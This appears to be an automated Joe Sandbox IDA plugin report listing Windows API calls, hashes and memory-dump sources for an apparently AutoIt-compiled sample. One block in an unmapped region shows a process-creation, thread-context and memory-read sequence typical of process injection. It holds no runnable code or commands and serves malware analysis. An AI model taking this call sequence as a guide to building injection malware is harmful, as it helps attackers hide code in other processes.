                                                        • String ID:
                                                        • API String ID: 1378193009-0
                                                        • Opcode ID: 5c2596eabcc9e97246d84ac27c04c511c61e3b4164e990dc03009f91bbdbdffd
                                                        • Instruction ID: 7b442cd997ad8b620d0b62cf9c8d67c572225e4b72b02b1d5d4ee5ad003553d6
                                                        • Opcode Fuzzy Hash: 5c2596eabcc9e97246d84ac27c04c511c61e3b4164e990dc03009f91bbdbdffd
                                                        • Instruction Fuzzy Hash: AC21D7749047889FE7728B248855FFBBBEDAF06314F04009EE79E56242C7747A84DB51
                                                        APIs
                                                        • _memset.LIBCMT ref: 000FEA39
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 000FEA83
                                                          • Part of subcall function 000C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C4743,?,?,000C37AE,?), ref: 000C4770
                                                          • Part of subcall function 000E0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000E07B0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                        • String ID: X
                                                        • API String ID: 3777226403-3081909835
                                                        • Opcode ID: 64503d67adbbc66f0308c071c992d46bbe45cff19a5ae023e939df8ce95f2e0a
                                                        • Instruction ID: 863561fba3b1dd71ba82e7bb115434c3cb5d6b12a90ae0b108cdfab67d9c2f8f
                                                        • Opcode Fuzzy Hash: 64503d67adbbc66f0308c071c992d46bbe45cff19a5ae023e939df8ce95f2e0a
                                                        • Instruction Fuzzy Hash: 0B219071A042889BCB51DF98C845BEE7BF9AF49714F00805AF508BB242DFF45989DFA1
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 001298F8
                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0012990F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: a0377717076b13fe67b6fe0a66b0d33c34e3fc891b8d75e27ff6a1cf06b9ab8c
                                                        • Instruction ID: 2b9bd12c60ef115151a7fbefa11648710135243fb090e0a95e020028ad714cc8
                                                        • Instruction Fuzzy Hash: 56D05E7958030DABDB50ABA0DC0EF9A773CE704700F0042B1BA54911A1EAB095A98B91
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22c6b2ecaec9450fb32eb7e43b5ad8fee41448fde622bc7c1f189875fa17702f
                                                        • Instruction ID: f23685816df6eb97bc103d38d9347e8e45b28a44e5664ef7631c2c9eeda63327
                                                        • Instruction Fuzzy Hash: 35F126756083419FCB14DF28C484A6ABBE5FF89314F14892EF8999B252DB30E945CF82
                                                        APIs
                                                          • Part of subcall function 000E0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000E0193
                                                          • Part of subcall function 000E0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 000E019B
                                                          • Part of subcall function 000E0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000E01A6
                                                          • Part of subcall function 000E0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000E01B1
                                                          • Part of subcall function 000E0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 000E01B9
                                                          • Part of subcall function 000E0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 000E01C1
                                                          • Part of subcall function 000D60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,000CF930), ref: 000D6154
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000CF9CD
                                                        • OleInitialize.OLE32(00000000), ref: 000CFA4A
                                                        • CloseHandle.KERNEL32(00000000), ref: 001045C8
                                                        Similarity
                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID:
                                                        • API String ID: 1986988660-0
                                                        • Opcode ID: e059b06e085b785126f23ffe432f3297772cf403460aaf53702f1211b2aa6810
                                                        • Instruction ID: 2a991521aad579fc616fb4aeaef1e0a45dcfd6b3f2280df57c4b41013c7552c6
                                                        • Instruction Fuzzy Hash: CA8198B4901A40CEC384EF79A944A597BE7FB98306790812EA419DBB72FB7046C5CF21
                                                        APIs
                                                        • _memset.LIBCMT ref: 000C4370
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C4415
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000C4432
                                                        Similarity
                                                        • API ID: IconNotifyShell_$_memset
                                                        • String ID:
                                                        • API String ID: 1505330794-0
                                                        • Opcode ID: 46fc9382fb23e495e0f8e40915489e705aa1479c5b449cee72b63191a80175c1
                                                        • Instruction ID: 75c6d519a04b15acea2db0565d94a05f6514efa93808f75a7a1e3f20ca5e098f
                                                        • Instruction Fuzzy Hash: 923191B0504701CFD761DF64D894B9FBBF9FB49308F00092EF69A82651EB71AA84CB52
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 000E5733
                                                          • Part of subcall function 000EA16B: __NMSG_WRITE.LIBCMT ref: 000EA192
                                                          • Part of subcall function 000EA16B: __NMSG_WRITE.LIBCMT ref: 000EA19C
                                                        • __NMSG_WRITE.LIBCMT ref: 000E573A
                                                          • Part of subcall function 000EA1C8: GetModuleFileNameW.KERNEL32(00000000,001833BA,00000104,?,00000001,00000000), ref: 000EA25A
                                                          • Part of subcall function 000EA1C8: ___crtMessageBoxW.LIBCMT ref: 000EA308
                                                          • Part of subcall function 000E309F: ___crtCorExitProcess.LIBCMT ref: 000E30A5
                                                          • Part of subcall function 000E309F: ExitProcess.KERNEL32 ref: 000E30AE
                                                          • Part of subcall function 000E8B28: __getptd_noexit.LIBCMT ref: 000E8B28
                                                        • RtlAllocateHeap.NTDLL(01430000,00000000,00000001,00000000,?,?,?,000E0DD3,?), ref: 000E575F
                                                        Similarity
                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: a2b5018d795b44bef76fe3e080ddc6a269f98d67c06e0a64a97e3621f1affac4
                                                        • Instruction ID: ca5c7085ebd328c3956a1c579dbb5f56e0b7b93dad493b0828f64a6cb781218b
                                                        • Instruction Fuzzy Hash: DF014535308B81DED6502777FC46AAE77888F8276BF100825F488BB193DF709D404720
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00129548,?,?,?,?,?,00000004), ref: 001298BB
                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00129548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 001298D1
                                                        • CloseHandle.KERNEL32(00000000,?,00129548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001298D8
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: 12b8e9e37169751ca32dab116f3a941a349f97b82f1d6d1cb6d14540f1e45855
                                                        • Instruction ID: cb7c2b229a11dbcc3d93191c6c0cdecbca531598f944bf1b435bedd545bb47bb
                                                        • Instruction Fuzzy Hash: D9E08636140228B7D7212F64EC09FCA7B59AB07B60F144124FB14695F087B125629798
                                                        APIs
                                                        • _free.LIBCMT ref: 00128D1B
                                                          • Part of subcall function 000E2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,000E9A24), ref: 000E2D69
                                                          • Part of subcall function 000E2D55: GetLastError.KERNEL32(00000000,?,000E9A24), ref: 000E2D7B
                                                        • _free.LIBCMT ref: 00128D2C
                                                        • _free.LIBCMT ref: 00128D3E
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                        • Instruction ID: 2b21e8f18823352c18707195951448e28c0a0d38141245f0b7576e2af676b0b9
                                                        • Instruction Fuzzy Hash: 82E012A16466558ACB24A6B9BD40BD313DC4F58352714091DB50DE7187CF64F8568524
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CALL
                                                        • API String ID: 0-4196123274
                                                        • Opcode ID: 3123a1e7671b24f09cbafdebca57f9e7367e1cc5fcb688f03afec34145f3cda8
                                                        • Instruction ID: 980f448c3da1e188b34c0e9901fa2679360b170e4be21df7afffc2a7a28428d3
                                                        • Instruction Fuzzy Hash: DD224470A08205DFC724DF14C495F6EB7E1BF89304F15896DE88A9B262DB71EC85DB82
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: EA06
                                                        • API String ID: 4104443479-3962188686
                                                        • Opcode ID: b0837a654d60edb6d5b8576f905e744a46c4c6d090ac0d2bc41f784ade287405
                                                        • Instruction ID: 2818c1bbb178e4dba42534b6f77c271b50976cf2b9d35b6449115ab7945e8850
                                                        • Instruction Fuzzy Hash: 43412821A041586BDF31AB648CB1FFE7FA2BB45310F29447DFC839A283D6209D8583A1
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                        • Instruction ID: c2ea202175fdee22d158e4d89b781a0876e4f979e9386bd6b7c79d0e9d27ac2b
                                                        • Instruction Fuzzy Hash: 91316FB1604606AFC714DF69C891E6DB3A9FF88320715862DE519CB691EB70ED60CF90
                                                        APIs
                                                        • IsThemeActive.UXTHEME ref: 000C4834
                                                          • Part of subcall function 000E336C: __lock.LIBCMT ref: 000E3372
                                                          • Part of subcall function 000E336C: DecodePointer.KERNEL32(00000001,?,000C4849,00117C74), ref: 000E337E
                                                          • Part of subcall function 000E336C: EncodePointer.KERNEL32(?,?,000C4849,00117C74), ref: 000E3389
                                                          • Part of subcall function 000C48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000C4915
                                                          • Part of subcall function 000C48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000C492A
                                                          • Part of subcall function 000C3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000C3B68
                                                          • Part of subcall function 000C3B3A: IsDebuggerPresent.KERNEL32 ref: 000C3B7A
                                                          • Part of subcall function 000C3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,001852F8,001852E0,?,?), ref: 000C3BEB
                                                          • Part of subcall function 000C3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 000C3C6F
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000C4874
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                        • String ID:
                                                        • API String ID: 1438897964-0
                                                        • Opcode ID: 6f8c4f99230c1660222e27599b63d3fa8e60de480de91f7c7cd0ddb064963089
                                                        • Instruction ID: 837b900665673febdb7d5c8dce4c8c7c1f40c190b978af380bd58ae7f8a5b407
                                                        • Instruction Fuzzy Hash: A4116A719083419BC700DF29D809A4EBFE9EB95750F10451EF044972B2DF709689CB92
                                                        APIs
                                                          • Part of subcall function 000E571C: __FF_MSGBANNER.LIBCMT ref: 000E5733
                                                          • Part of subcall function 000E571C: __NMSG_WRITE.LIBCMT ref: 000E573A
                                                          • Part of subcall function 000E571C: RtlAllocateHeap.NTDLL(01430000,00000000,00000001,00000000,?,?,?,000E0DD3,?), ref: 000E575F
                                                        • std::exception::exception.LIBCMT ref: 000E0DEC
                                                        • __CxxThrowException@8.LIBCMT ref: 000E0E01
                                                          • Part of subcall function 000E859B: RaiseException.KERNEL32(?,?,?,00179E78,00000000,?,?,?,?,000E0E06,?,00179E78,?,00000001), ref: 000E85F0
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3902256705-0
                                                        • Opcode ID: 5b1efde6c3c133767f180c9676d0f6fb144af418c0f83bf6c63303b95f17262c
                                                        • Instruction ID: 5a21c7836841b2b4876955b93c6c4edda72b3b7b2da5f75b9ec56c724e786b71
                                                        • Instruction Fuzzy Hash: 32F0A47250425AAEDB10AAEAED059DFBBACDF01311F104425FD18B6292DFB09A94C7D1
                                                        APIs
                                                          • Part of subcall function 000E8B28: __getptd_noexit.LIBCMT ref: 000E8B28
                                                        • __lock_file.LIBCMT ref: 000E53EB
                                                          • Part of subcall function 000E6C11: __lock.LIBCMT ref: 000E6C34
                                                        • __fclose_nolock.LIBCMT ref: 000E53F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 014CE46B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014CE501
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014CE523
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        APIs
                                                          • Part of subcall function 000C4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 000C4BEF
                                                          • Part of subcall function 000E525B: __wfsopen.LIBCMT ref: 000E5266
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,001852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000C4E0F
                                                          • Part of subcall function 000C4B6A: FreeLibrary.KERNEL32(00000000), ref: 000C4BA4
                                                          • Part of subcall function 000C4C70: _memmove.LIBCMT ref: 000C4CBA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                        • String ID:
                                                        • API String ID: 1396898556-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 000E48A6
                                                          • Part of subcall function 000E8B28: __getptd_noexit.LIBCMT ref: 000E8B28
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2597487223-0
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,001852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000C4E7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        APIs
                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000E07B0
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath_memmove
                                                        • String ID:
                                                        • API String ID: 2514874351-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 014CECC1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0014CB37
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0014CB95
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0014CBD6
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0014CC00
                                                        • SendMessageW.USER32 ref: 0014CC29
                                                        • _wcsncpy.LIBCMT ref: 0014CC95
                                                        • GetKeyState.USER32(00000011), ref: 0014CCB6
                                                        • GetKeyState.USER32(00000009), ref: 0014CCC3
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0014CCD9
                                                        • GetKeyState.USER32(00000010), ref: 0014CCE3
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0014CD0C
                                                        • SendMessageW.USER32 ref: 0014CD33
                                                        • SendMessageW.USER32(?,00001030,?,0014B348), ref: 0014CE37
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0014CE4D
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0014CE60
                                                        • SetCapture.USER32(?), ref: 0014CE69
                                                        • ClientToScreen.USER32(?,?), ref: 0014CECE
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0014CEDB
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0014CEF5
                                                        • ReleaseCapture.USER32 ref: 0014CF00
                                                        • GetCursorPos.USER32(?), ref: 0014CF3A
                                                        • ScreenToClient.USER32(?,?), ref: 0014CF47
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0014CFA3
                                                        • SendMessageW.USER32 ref: 0014CFD1
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0014D00E
                                                        • SendMessageW.USER32 ref: 0014D03D
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0014D05E
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0014D06D
                                                        • GetCursorPos.USER32(?), ref: 0014D08D
                                                        • ScreenToClient.USER32(?,?), ref: 0014D09A
                                                        • GetParent.USER32(?), ref: 0014D0BA
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0014D123
                                                        • SendMessageW.USER32 ref: 0014D154
                                                        • ClientToScreen.USER32(?,?), ref: 0014D1B2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0014D1E2
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0014D20C
                                                        • SendMessageW.USER32 ref: 0014D22F
                                                        • ClientToScreen.USER32(?,?), ref: 0014D281
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0014D2B5
                                                          • Part of subcall function 000C25DB: GetWindowLongW.USER32(?,000000EB), ref: 000C25EC
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0014D351
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
